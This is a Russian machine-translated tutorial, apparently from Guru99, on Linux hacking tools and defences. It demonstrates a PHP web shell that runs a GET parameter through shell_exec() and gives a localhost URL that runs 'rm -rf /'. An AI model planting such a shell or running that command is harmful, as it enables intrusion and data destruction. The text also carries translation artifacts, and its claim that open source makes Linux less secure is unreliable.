Взлом ОС Linux: Взлом с помощью Ubuntu (Учебное пособие по командам)

Linux — наиболее широко используемая серверная операционная система, особенно для веб-серверов. Это открытый исходный код; это означает, что любой может иметь доступ к исходному коду. Это делает его менее безопасным по сравнению с другими операционными системами, поскольку злоумышленники могут изучить исходный код, чтобы найти уязвимости.. Linux для хакеров – это использование этих уязвимостей для получения несанкционированного доступа к системе.

В этой статье мы познакомим вас с тем, что такое Linux, с его уязвимостями безопасности, взломом с помощью Ubuntu и мерами противодействия, которые вы можете принять.

Краткое примечание по Linux

Linux - это операционная система с открытым исходным кодом. Существует множество дистрибутивов операционных систем на базе Linux, таких как Redhat, Fedora, Ubuntu и т. д. В отличие от других операционных систем, Linux менее безопасен, когда дело касается безопасности. Это связано с тем, что исходный код доступен бесплатно, поэтому его легко изучить на наличие уязвимостей и использовать их по сравнению с другими операционными системами, не имеющими открытого исходного кода. Linux можно использовать в качестве операционной системы для сервера, настольного компьютера, планшета или мобильного устройства.

Программами Linux можно управлять с помощью графического интерфейса или команд. Команды Linux для Kali Linux взлом более эффективен и результативн по сравнению с использованием графического интерфейса. По этой причине полезно знать основные команды Linux для взлома.

Обратитесь к этим руководствам https://www.guru99.com/unix-linux-tutorial.html о том, как начать работу Kali Linux хаки.

Инструменты взлома Linux

  • Nessus– этот инструмент можно использовать для взлома Ubuntu, сканирования настроек конфигурации, исправлений, сетей и т. д. его можно найти по адресу https://www.tenable.com/products/nessus
  • НМап. Этот инструмент можно использовать для мониторинга хостов, работающих на сервере, и служб, которые они используют. Его также можно использовать для сканирования портов. Его можно найти по адресу https://nmap.org/
  • САРА – SARA — это аббревиатура от слова «помощник по исследованиям аудитора безопасности». Как следует из названия, этот инструмент можно использовать для аудита сетей на предмет таких угроз, как SQL-инъекция, XSS и т. д. его можно найти по адресу http://www-arc.com/sara/sara.html

Приведенный выше список не является исчерпывающим; это дает вам представление об инструментах, доступных для взлома Ubuntu и систем Linux.

Как предотвратить взлом Linux

Linux Hacking использует уязвимости операционной системы. Организация может принять следующиеwing политику защиты от таких атак.

  • Управление патчами– патчи исправляют ошибки, которые злоумышленники используют для компрометации системы. Хорошая политика управления исправлениями обеспечит постоянное применение соответствующих исправлений к вашей системе.
  • Правильная конфигурация ОС– другие эксплойты используют недостатки конфигурации сервера. Неактивные имена пользователей и демоны должны быть отключены. Настройки по умолчанию, такие как общие пароли для приложений, имена пользователей по умолчанию и некоторые номера портов, следует изменить.
  • Система обнаружения вторжений– такие инструменты можно использовать для обнаружения несанкционированного доступа к системе. Некоторые инструменты имеют возможность обнаруживать и предотвращать такие атаки.

Хакерские действия: взломать систему Ubuntu Linux с помощью PHP

В этом практическом сценарии мы научимся взламывать Ubuntu и предоставим вам базовую информацию о том, как вы можете использовать PHP скомпрометировать Linux. Мы не собираемся преследовать какую-либо жертву. Если вы хотите опробовать его, вы можете установить LAMPP на свой локальный компьютер.

PHP поставляется с двумя функциями, которые можно использовать для выполнения команд взлома Linux. Он имеет функции exec() и Shell_exec(). Функция exec() возвращает последнюю строку вывода команды, а функция Shell_exec() возвращает весь результат команды в виде строки.

В демонстрационных целях предположим, что менеджеры злоумышленников загрузили следующий файл.wing файл на веб-сервере.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

ВОТ,

Приведенный выше сценарий получает команду из переменной GET с именем cmd. Команда выполняется с помощью Shell_exec(), а результаты возвращаются в браузер.

Приведенный выше код можно использовать с помощью следующегоwing URL

http://localhost/cp/konsole.php?cmd=ls%20-l

ВОТ,

  • «…konsole.php?cmd=ls%20-l»присваивает значение ls –l переменной cmd.

Команда в Ubuntu для взлома сервера будет выполнена так:

shell_exec('ls -l') ;

Выполнение приведенного выше кода на веб-сервере дает результаты, аналогичные следующим:wing.

Взломайте систему Ubuntu Linux с помощью PHP

Приведенная выше команда просто отображает файлы в текущем каталоге и разрешения.

Предположим, злоумышленник проходит мимо следующегоwing команду

rm -rf /

ВОТ,

  • «rm» удаляет файлы
  • «rf» заставляет команду rm выполняться в рекурсивном режиме. Удаление всех папок и файлов
  • «/» указывает команде начать удаление файлов из корневого каталога.

URL-адрес атаки будет выглядеть примерно так

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Итоги

  • Linux — популярная операционная система для серверов, настольных компьютеров, планшетов и мобильных устройств.
  • Linux имеет открытый исходный код, и исходный код может получить кто угодно. Это позволяет легко обнаружить уязвимости. Это одна из лучших ОС для хакеров.
  • Базовые и сетевые команды взлома в Ubuntu представляют ценность для хакеров Linux.
  • Уязвимости — это слабости, которые можно использовать для компрометации системы.
  • Хорошая безопасность может помочь защитить систему от взлома злоумышленником.
Guru99 спонсируется Invicti.
Invicti

Invicti, разработчики технологии Proof Based Scanning, спонсировали проект Guru99, чтобы повысить осведомленность о безопасности веб-приложений и позволить большему количеству разработчиков узнать о написании безопасного кода.